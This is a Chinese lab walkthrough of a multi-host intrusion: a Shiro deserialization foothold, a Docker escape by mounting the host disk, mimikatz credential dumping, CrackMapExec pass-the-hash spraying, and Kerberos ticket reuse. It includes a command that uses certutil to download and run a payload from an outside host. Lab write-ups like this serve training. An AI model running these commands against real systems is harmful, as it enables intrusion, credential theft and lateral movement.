VPC4-通达oa-docker逃逸-shiro反序列化-hash传递-CrackMapExec喷射-历史ptt攻击-进程注入

由于本人是菜鸡,不会免杀,所有免杀的部分就直接跳过了

(hhh)

靶场地址:

链接: https://pan.baidu.com/s/1Fh1Zg79n1yjCPe6rrQ2apA 提取码: qiag

第一台ubuntu(docker逃逸,shiro反序列化)

fscan扫到一台机器

发现remember me,怀疑存在shiro反序列化漏洞

反弹到kali上

ls -al发现根目录有docker文件,说明我们可能在docker中

cat /proc/self/status | grep CapEff(发现存在特权逃逸)

查看目录:fdisk -l

mkdir /test && mount /dev/sda1 /test

(把原始机里面的机器移动到 /test里面)

发现了真机的目录的东西

进入里面

更改里面的密钥为自己kali主机的密钥对文件

将这个值复制到

直接ssh连接

上线msf

生成后门后,启动服务

第二种信息收集方式,frp

然后连接fscan开始扫描

第二台(通达oa)

上线msf

第一台主机建立路由

run post/multi/manage/autoroute

第三台 第四台密码喷射

hashdump导出所有的hash

或者用mimikatz导出、

两个口令

第一种:mimikatz.exe " privilege::debug" "log" sekurlsa::logonpasswords"

第二种:

mimikatz # privilege::debug

mimikatz # token::elevate

mimikatz # lsadump::sam

CrackMapExec-密码喷射

proxychains crackmapexec smb 192.168.3.1-150 -u Administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth

发现有两个成功的(出现这(Pwn3d!)就表示成功的)

监听

proxychains crackmapexec smb 192.168.3.1-150 -u Administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.11/1979.exe 1979.exe & 1979.exe"

成功上线

第五台(历史ptt攻击)

未导出票据之前

导出票据:

mimikatz sekurlsa::tickets /export

查看票据:shell klist

利用票据连接:shell dir \owa2010cn-god\c$

因为可能是system或者administrator权限,所有可能连接不上,就尝试进程注入到域用户上

ps查看进程

migrate

相关推荐
小白考证进阶中15 小时前
终于赶在考试券过期前把Oracle OCP证书考下来了!
运维·数据库·oracle·dba·开闭原则·数据库管理员
keep__go16 小时前
postgresql9.2.4 跨版本升级14.6
linux·运维·数据库·postgresql
Doris_LMS16 小时前
Git的强软硬回退(三)
运维·服务器·数据库·git·idea
(Charon)16 小时前
基于 epoll 的高并发服务器原理与实现(对比 select 和 poll)
运维·服务器
hunzi_116 小时前
搭建商城系统安全防护体系的核心要点与实施策略
安全·系统安全
Jtti17 小时前
在 Debian 系统上清理缓存的方式和具体操作方法
运维·缓存·debian
伐尘17 小时前
【mac】如何在 macOS 终端中高效查找文件:五种实用方法
运维·macos
被巨款砸中18 小时前
前端视角下的 Web 安全攻防:XSS、CSRF、DDoS 一次看懂
前端·安全·xss
似水流年 光阴已逝18 小时前
《网络安全实战:CC攻击(应用层)与DDoS攻击(网络层)的底层逻辑与防御体系》
安全·web安全·ddos·网络攻击·安全防护·cc攻击
zzu123zsw18 小时前
第15章 Jenkins最佳实践
运维·jenkins